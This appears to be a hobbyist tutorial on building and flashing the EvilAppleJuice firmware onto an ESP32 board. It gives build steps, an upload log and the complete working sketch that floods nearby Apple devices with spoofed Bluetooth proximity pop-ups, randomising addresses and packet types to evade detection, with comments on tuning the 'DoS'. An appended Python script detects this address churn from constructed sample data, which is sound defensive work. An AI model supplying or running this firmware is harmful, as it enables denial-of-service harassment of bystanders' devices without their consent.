ESP32: using EvilAppleJuice to trigger endless pop-ups on Apple devices
Demo
Materials
A computer
An ESP32 development board (CH340 USB-serial chip)
A copy of the firmware: ckcr4lyf/EvilAppleJuice-ESP32: Spam Apple Proximity Messages via an ESP32 (github.com)
Build steps
Install the CH340 driver
Plug in the development board
The board should now show up in Device Manager
Install the PlatformIO extension in VS Code, clone the project and import it
Once the folder is opened, PlatformIO installs the dependencies automatically
Change the board model in platformio.ini
My board is a plain ESP32, but the original project targets the ESP32-C3, so flashing it as-is fails. The environment section I used:
```ini
[env:esp32dev]
platform = espressif32
board = esp32dev
framework = arduino
monitor_speed = 115200
```
Build and upload
```text
* Executing task: C:\Users\80597\.platformio\penv\Scripts\platformio.exe run --target upload

Processing esp32dev (platform: espressif32; board: esp32dev; framework: arduino)
--------------------------------------------------------------------------------------------------------------------
Verbose mode can be enabled via `-v, --verbose` option
CONFIGURATION: https://docs.platformio.org/page/boards/espressif32/esp32dev.html
PLATFORM: Espressif 32 (6.4.0) > Espressif ESP32 Dev Module
HARDWARE: ESP32 240MHz, 320KB RAM, 4MB Flash
DEBUG: Current (cmsis-dap) External (cmsis-dap, esp-bridge, esp-prog, iot-bus-jtag, jlink, minimodule, olimex-arm-usb-ocd, olimex-arm-usb-ocd-h, olimex-arm-usb-tiny-h, olimex-jtag-tiny, tumpa)
PACKAGES:
 - framework-arduinoespressif32 @ 3.20011.230801 (2.0.11)
 - tool-esptoolpy @ 1.40501.0 (4.5.1)
 - tool-mkfatfs @ 2.0.1
 - tool-mklittlefs @ 1.203.210628 (2.3)
 - tool-mkspiffs @ 2.230.0 (2.30)
 - toolchain-xtensa-esp32 @ 8.4.0+2021r2-patch5
LDF: Library Dependency Finder -> https://bit.ly/configure-pio-ldf
LDF Modes: Finder ~ chain, Compatibility ~ soft
Found 33 compatible libraries
Scanning dependencies...
Dependency Graph
|-- ESP32 BLE Arduino @ 2.0.0
Building in release mode
Retrieving maximum program size .pio\build\esp32dev\firmware.elf
Checking size .pio\build\esp32dev\firmware.elf
Advanced Memory Usage is available via "PlatformIO Home > Project Inspect"
RAM:   [= ]  11.5% (used 37816 bytes from 327680 bytes)
Flash: [======== ]  82.0% (used 1074805 bytes from 1310720 bytes)
Configuring upload protocol...
AVAILABLE: cmsis-dap, esp-bridge, esp-prog, espota, esptool, iot-bus-jtag, jlink, minimodule, olimex-arm-usb-ocd, olimex-arm-usb-ocd-h, olimex-arm-usb-tiny-h, olimex-jtag-tiny, tumpa
CURRENT: upload_protocol = esptool
Looking for upload port...
Auto-detected: COM10
Uploading .pio\build\esp32dev\firmware.bin
esptool.py v4.5.1
Serial port COM10
Connecting....
Chip is ESP32-D0WD-V3 (revision v3.1)
Features: WiFi, BT, Dual Core, 240MHz, VRef calibration in efuse, Coding Scheme None
Crystal is 40MHz
MAC: 08:d1:f9:ec:f4:78
Uploading stub...
Running stub...
Stub running...
Changing baud rate to 460800
Changed.
Configuring flash size...
Flash will be erased from 0x00001000 to 0x00005fff...
Flash will be erased from 0x00008000 to 0x00008fff...
Flash will be erased from 0x0000e000 to 0x0000ffff...
Flash will be erased from 0x00010000 to 0x00117fff...
Compressed 17536 bytes to 12203...
Writing at 0x00001000... (100 %)
Wrote 17536 bytes (12203 compressed) at 0x00001000 in 0.4 seconds (effective 373.2 kbit/s)...
Hash of data verified.
Compressed 3072 bytes to 146...
Writing at 0x00008000... (100 %)
Wrote 3072 bytes (146 compressed) at 0x00008000 in 0.0 seconds (effective 946.0 kbit/s)...
Hash of data verified.
Compressed 8192 bytes to 47...
Writing at 0x0000e000... (100 %)
Wrote 8192 bytes (47 compressed) at 0x0000e000 in 0.0 seconds (effective 1894.2 kbit/s)...
Hash of data verified.
Compressed 1080560 bytes to 681146...
Writing at 0x00010000... (2 %)
Writing at 0x0001bcf3... (4 %)
Writing at 0x000276a4... (7 %)
Writing at 0x00037be5... (9 %)
Writing at 0x0003d11d... (11 %)
Writing at 0x00042a88... (14 %)
Writing at 0x000483cb... (16 %)
Writing at 0x0004d996... (19 %)
Writing at 0x00052fb8... (21 %)
Writing at 0x00058a42... (23 %)
Writing at 0x0005e41f... (26 %)
Writing at 0x00063a0e... (28 %)
Writing at 0x00068d90... (30 %)
Writing at 0x0006e1de... (33 %)
Writing at 0x000745b5... (35 %)
Writing at 0x00079e43... (38 %)
Writing at 0x0007faa9... (40 %)
Writing at 0x000855d6... (42 %)
Writing at 0x0008aebf... (45 %)
Writing at 0x0009055c... (47 %)
Writing at 0x0009609b... (50 %)
Writing at 0x0009b648... (52 %)
Writing at 0x000a0fbc... (54 %)
Writing at 0x000a6dc3... (57 %)
Writing at 0x000ad13b... (59 %)
Writing at 0x000b3b46... (61 %)
Writing at 0x000b936e... (64 %)
Writing at 0x000beeb2... (66 %)
Writing at 0x000c436a... (69 %)
Writing at 0x000c9af0... (71 %)
Writing at 0x000cf669... (73 %)
Writing at 0x000d5482... (76 %)
Writing at 0x000db836... (78 %)
Writing at 0x000e146d... (80 %)
Writing at 0x000e6e17... (83 %)
Writing at 0x000ec737... (85 %)
Writing at 0x000f2c0b... (88 %)
Writing at 0x000fae65... (90 %)
Writing at 0x001036a0... (92 %)
Writing at 0x00109491... (95 %)
Writing at 0x0010f067... (97 %)
Writing at 0x001146d1... (100 %)
Wrote 1080560 bytes (681146 compressed) at 0x00010000 in 15.5 seconds (effective 559.3 kbit/s)...
Hash of data verified.

Leaving...
Hard resetting via RTS pin...
=========================================== [SUCCESS] Took 22.72 seconds ===========================================
* Terminal will be reused by tasks, press any key to close it.
```
Test the pop-up function
Add an LED blink to show the running state
I added a blink on ledPin (GPIO 2) around the point where the advertisement payload is chosen, so the board visibly signals each advertising cycle. The full sketch with that change:
```cpp
// This example takes heavy inspiration from the ESP32 example by ronaldstoner
// Based on the previous work of chipik / _hexway / ECTO-1A & SAY-10
// See the README for more info

#include <Arduino.h>
#include <BLEDevice.h>
#include <BLEUtils.h>
#include <BLEServer.h>
#include "devices.hpp"

const int ledPin = 2;          // status LED added in this post

BLEAdvertising *pAdvertising;  // global variable
uint32_t delaySeconds = 500;   // ms
int device_choice = 0;

void setup() {
  Serial.begin(115200);
  Serial.println("Starting ESP32 BLE");

  // This is specific to the AirM2M ESP32 board
  // https://wiki.luatos.com/chips/esp32c3/board.html
  pinMode(12, OUTPUT);
  pinMode(13, OUTPUT);

  BLEDevice::init("AirPods 69");
  pinMode(ledPin, OUTPUT);

  // Create the BLE Server
  BLEServer *pServer = BLEDevice::createServer();
  pAdvertising = pServer->getAdvertising();

  // seems we need to init it with an address in setup() step.
  esp_bd_addr_t null_addr = {0xFE, 0xED, 0xC0, 0xFF, 0xEE, 0x69};
  pAdvertising->setDeviceAddress(null_addr, BLE_ADDR_TYPE_RANDOM);
}

void loop() {
  // Turn lights on during "busy" part
  digitalWrite(12, HIGH);
  digitalWrite(13, HIGH);

  // First generate fake random MAC
  esp_bd_addr_t dummy_addr = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
  for (int i = 0; i < 6; i++) {
    dummy_addr[i] = random(256);

    // It seems for some reason first 4 bits
    // Need to be high (aka 0b1111), so we
    // OR with 0xF0
    if (i == 0) {
      dummy_addr[i] |= 0xF0;
    }
  }

  BLEAdvertisementData oAdvertisementData = BLEAdvertisementData();

  // Randomly pick data from one of the devices
  // First decide short or long
  // 0 = long (headphones), 1 = short (misc stuff like Apple TV)
  digitalWrite(ledPin, HIGH);
  delay(200);  // keep the LED visibly on while the payload is chosen
  if (device_choice == 0) {
    int index = random(17);
    oAdvertisementData.addData(std::string((char*)DEVICES[index], 31));
    device_choice = 1;
  } else {
    int index = random(12);
    oAdvertisementData.addData(std::string((char*)SHORT_DEVICES[index], 23));
    device_choice = 0;
  }
  digitalWrite(ledPin, LOW);

  /*  Page 191 of Apple's "Accessory Design Guidelines for Apple Devices (Release R20)" recommends to use only one
      of the three advertising PDU types when you want to connect to Apple devices.
      // 0 = ADV_TYPE_IND,
      // 1 = ADV_TYPE_SCAN_IND
      // 2 = ADV_TYPE_NONCONN_IND
      Randomly using any of these PDU types may increase detectability of spoofed packets.

      What we know for sure:
      - AirPods Gen 2: this advertises ADV_TYPE_SCAN_IND packets when the lid is opened and ADV_TYPE_NONCONN_IND
        when in pairing mode (when the rear case button is held).
        Consider using only these PDU types if you want to target Airpods Gen 2 specifically.
  */
  int adv_type_choice = random(3);
  if (adv_type_choice == 0) {
    pAdvertising->setAdvertisementType(ADV_TYPE_IND);
  } else if (adv_type_choice == 1) {
    pAdvertising->setAdvertisementType(ADV_TYPE_SCAN_IND);
  } else {
    pAdvertising->setAdvertisementType(ADV_TYPE_NONCONN_IND);
  }

  // Set the device address, advertisement data
  pAdvertising->setDeviceAddress(dummy_addr, BLE_ADDR_TYPE_RANDOM);
  pAdvertising->setAdvertisementData(oAdvertisementData);

  // Set advertising interval
  /*  According to Apple's Technical Q&A QA1931 (https://developer.apple.com/library/archive/qa/qa1931/_index.html),
      Apple recommends an advertising interval of 20ms to developers who want to maximize the probability of their
      BLE accessories to be discovered by iOS.

      These lines of code fix the interval to 20ms. Enabling these MIGHT increase the effectiveness of the DoS.
      Note this has not undergone thorough testing.
  */
  //pAdvertising->setMinInterval(0x20);
  //pAdvertising->setMaxInterval(0x20);
  //pAdvertising->setMinPreferred(0x20);
  //pAdvertising->setMaxPreferred(0x20);

  // Start advertising
  Serial.println("Sending Advertisement...");
  pAdvertising->start();

  // Turn lights off while "sleeping"
  digitalWrite(12, LOW);
  digitalWrite(13, LOW);
  delay(delaySeconds);  // delay for delaySeconds milliseconds
  pAdvertising->stop();
}
```
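As an added example, not part of this post or the EvilAppleJuice-ESP32 project, the following Python script shows what the sketch above looks like from the defender's side. A BLE scanner that logs (time, advertiser address, PDU type) sees a fresh random-static address every delaySeconds (500 ms), and because the loop ORs the first octet with 0xF0, every one of those addresses starts with nibble 0xF rather than spreading over 0xC..0xF as genuinely random static addresses do. The detector counts distinct random-static addresses in a sliding window and flags the churn, and separately reports the share of addresses carrying that forced nibble. The observation list is constructed sample data; the 0xF0 fingerprint is a weak heuristic drawn only from the code above, not a property of Apple's proximity protocol.

```python
"""Address-churn detector for BLE advertisement spam (added example, constructed data)."""
from collections import deque

# Constructed scanner observations: (seconds, advertiser address, PDU type).
# 5c:f9:... is a benign device re-advertising from a stable public address;
# the f*:... entries mimic the sketch above: a new random address per cycle.
SAMPLE_OBSERVATIONS = [
    (0.0, "5c:f9:38:10:22:a1", "ADV_IND"),
    (0.5, "f3:91:0a:77:c2:11", "ADV_SCAN_IND"),
    (1.0, "f8:12:bb:05:6e:d4", "ADV_NONCONN_IND"),
    (1.5, "fa:44:19:e0:10:2c", "ADV_IND"),
    (2.0, "5c:f9:38:10:22:a1", "ADV_IND"),
    (2.0, "f1:70:55:02:98:0b", "ADV_SCAN_IND"),
    (2.5, "fc:03:6d:aa:e4:57", "ADV_NONCONN_IND"),
    (3.0, "f6:e2:40:1b:73:99", "ADV_IND"),
    (3.5, "f0:5a:21:9c:0f:42", "ADV_IND"),
    (4.0, "ff:18:c7:63:2d:b0", "ADV_SCAN_IND"),
]


def first_octet(addr: str) -> int:
    return int(addr.split(":")[0], 16)


def is_random_static(addr: str) -> bool:
    """Random static addresses have the two most significant bits of the
    first octet set (0b11xxxxxx), i.e. the octet is 0xC0 or above."""
    return first_octet(addr) >= 0xC0


def has_forced_top_nibble(addr: str) -> bool:
    """Heuristic only (assumption from the sketch): first octet OR 0xF0 means
    the top nibble is always 0xF instead of any of 0xC, 0xD, 0xE, 0xF."""
    return (first_octet(addr) & 0xF0) == 0xF0


def detect_address_churn(observations, window_s=5.0, threshold=6):
    """Return (time, distinct_count) alerts whenever more than `threshold`
    distinct random-static addresses were seen within the trailing window."""
    window = deque()  # (t, addr) pairs no older than window_s
    alerts = []
    for t, addr, _pdu in observations:
        if not is_random_static(addr):
            continue  # public / stable addresses are not part of the churn signal
        window.append((t, addr))
        while window and t - window[0][0] > window_s:
            window.popleft()
        distinct = len({a for _, a in window})
        if distinct > threshold:
            alerts.append((t, distinct))
    return alerts


def forced_nibble_ratio(observations) -> float:
    """Fraction of distinct random-static addresses whose top nibble is 0xF.
    A value near 1.0 over many addresses matches the OR-with-0xF0 artifact."""
    addrs = {a for _, a, _ in observations if is_random_static(a)}
    if not addrs:
        return 0.0
    return sum(has_forced_top_nibble(a) for a in addrs) / len(addrs)


if __name__ == "__main__":
    print("churn alerts:", detect_address_churn(SAMPLE_OBSERVATIONS))
    print("forced-nibble ratio:", forced_nibble_ratio(SAMPLE_OBSERVATIONS))
```

On the constructed data the churn alert fires at 3.5 s (seven distinct random addresses in the window) and again at 4.0 s, and every random address carries the forced nibble. Real scanner output will contain plenty of legitimate random addresses (phones rotate resolvable private addresses too), so the window size and threshold have to be tuned against a baseline of the environment before the alert is trusted.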